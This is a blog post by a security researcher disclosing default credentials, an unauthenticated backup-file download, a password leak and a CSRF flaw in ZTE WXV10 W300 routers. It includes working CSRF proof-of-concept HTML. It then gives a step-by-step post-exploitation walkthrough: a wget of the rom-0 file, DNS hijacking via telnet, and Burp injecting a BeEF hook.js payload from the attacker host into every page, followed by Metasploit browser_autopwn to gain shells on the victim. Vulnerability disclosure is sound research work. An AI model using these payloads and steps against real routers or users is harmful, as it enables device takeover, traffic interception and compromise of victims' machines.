ZTE WXV10 W300 Multiple Vulnerabilities

Default Password Being Used (CVE-2014-4018)

In ZTE routers the username is a constant which is “admin” and the password by default is “admin”

ROM-0 Backup File Disclosure (CVE-2014-4019)

There is a rom-0 backup file contains sensitive information such as the passwords. There is a disclosure in which anyone can download that file without any authentication by a simple GET request.

http://192.168.1.1/rom-0

You can find the router password using my rom-0 configuration decompressor.

PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)

If you look at the frame source in the “Internet” tab under the “Interface Setup” you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.

function doLoad() {
	var value = document.forms[0].wanTypeRadio[2].checked;
	doEnable();
	QosCheck();
	WANChkIdleTimeT();
	if (value)
	pppStaticCheck();
	LockWhenPVC0();
	LockPVC();
	if(document.forms[0].wan_PPPPassword != null)
	{
	    document.forms[0].wan_PPPPassword.value = pwdppp;
	}
}

The “pwdpp” is loaded from an external file which you can see at the bottom of the page.

<script language="javascript" src="/basic/tc2wanfun.js"></script>

Once the user authenticates the router till another successful restart the password is written in that external JS file.

Admin Password Manipulation XSRF (CVE-2014-4155)

You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication.

POC:

ᐸiframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0">ᐸ/iframe>

If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password.
Of course since there is no XSRF token in the request you change the password as you wish.
POC:

<html>
  <body>
    <form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
      <input type="hidden" name="uiViewTools_Password" value="your_passwd" />
      <input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
      <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

Denial Of Service

You can see my previous post about this vulnerability and exploit.
https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html

Exploit

Compromising the System

In here I am considering the scope of the router only. So after exploiting the router what can we do in the post exploitation phase? There are so many things you can do. Out of them I will be demonstrating about DNS intercepting. Before reading this here is a small disclaimer from me. I will not show you to configure this using your external IP, you have to figure it out by yourself. I take no responsibility for any kind of damage you cause. Use these tools and methodologies for penetration testing, research and educational purposes only. For an untrained eye this might look like something illegal and using hacking tools for harming people. These tools are used in penetration testing and it is your sole responsibility to use them without harming anyone for ethical purposes. You can practice these in your home virtual lab.
In penetration testing there can be many methods to accomplish one task. It’s the tester’s creativity to use the resources in an effective way. I will be using a DNS proxy DNSChef, A web server for forwarding requests Webmitm, An intercepting proxy such as Burp Suite, BeEF and Metasploit for compromising the victim.
Attacking machines:

  • Kali Linux – 192.168.1.4
  • Windows 8 – 192.168.1.6

Victim:

  • Windows XP- 192.168.1.5

Let’s do a nmap scan first
nmap -sV -sS -vv -T5 -p80 -oG – 192.168.1.1

  • -sV – Version Scan
  • -sS – SYN scan
  • -vv – Verbose mode, I am giving twice here
  • -T5 – Very Aggressive
  • -p – The port
  • -oG – Grepable Output, if we are scanning a large subnet this might come in handy in filtering only ‘RomPager’ routers.


Next based upon the above vulnerabilities you can get inside the router. We can get the rom-0 file by using wget since it requires just a GET request.

wget http://192.168.1.1/rom-0 -O rom0

After that you can use my decompressor to get the router’s password.

Now let’s start our DNS proxy.

Dnschef --interface 192.168.1.4 --fakeip 192.168.1.4

  • –interface – By default it listens on localhost for security reasons. We will specify our interface to listen
  • –fakeip – This fake all replies to point to 192.168.1.4

Next we need to setup a small web server which can handle HTTP and HTTPS requests. I will be using webmitm which is a tool from the dsniff buddle. By default it forwards the data to the real sites instead we need to forward the requests to our intercepting proxy Burp.

webmitm –d 192.168.1.6
  • -d for debugging purposes



We need to change the router’s primary DNS to our attacking machine. For this you can change the DNS settings by using the web interface like this or using telnet.

Using telnet type

set lan dhcpdns [attacker machine] 8.8.8.8

I am using the secondary IP as 8.8.8.8 as we don’t need compromised hosts again and again requesting from us, instead they will request from Google.
After configuring the tools and the DNS we need to configure Burp. I am running Burp in a separate machine is because webmitm has already take port 80 and 443. We need to bind to port 80 and 443 on all interfaces using Burp and listen to all incoming connections. We are going to use invisible proxying since it allows non-proxy-aware clients to connect directly to a Proxy listener.

Let’s start the Browser Exploitation Framework on Kali.

Now we need to inject our hook.js to the browser. For this purpose we set Burp to inject this script to each request intercepted by it. I’ll replace the &lt;head&gt; tag using

<script src="http://192.168.1.4:3000/hook.js"></script></head>


I am replacing the tag to our malicious JS payload. Now burp will inject our payload to each webpage 🙂
Well, that is it! Let’s browse using the victim machine and see. We can nicely see all the requests being nicely forwarded to us and since we are using Burp we can nicely intercept them. You can leave intercept off and view the HTTP History anytime.

Let’s check the page source that Burp correctly injected our hook.js.

It has successfully injected and let’s check the UI of BeEF.

There are many things you can do with the browser. For the sake of this post let’s send a simple alert box and check.


Now how to compromise the system? There are many methods you can do it. I will start browser_autopwn and inject via an invisible iframe into browsers using BeEF 😉
Let’s start browser_autopwn using metasloit

Inject using BeEF’s invisible frame.

And w00t! I got 7 sessions for Windows XP ha 😀 This is due to successful exploitation of 7 exploits.

Here is a small video I made.

Hope you enjoyed this write-up 😉
http://packetstormsecurity.com/files/127129/ZTE-WXV10-W300-Disclosure-CSRF-Default.html
http://www.exploit-db.com/exploits/33803
http://www.routerpwn.com/ZTE/

Advertisements

9 thoughts on “ZTE WXV10 W300 Multiple Vulnerabilities

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s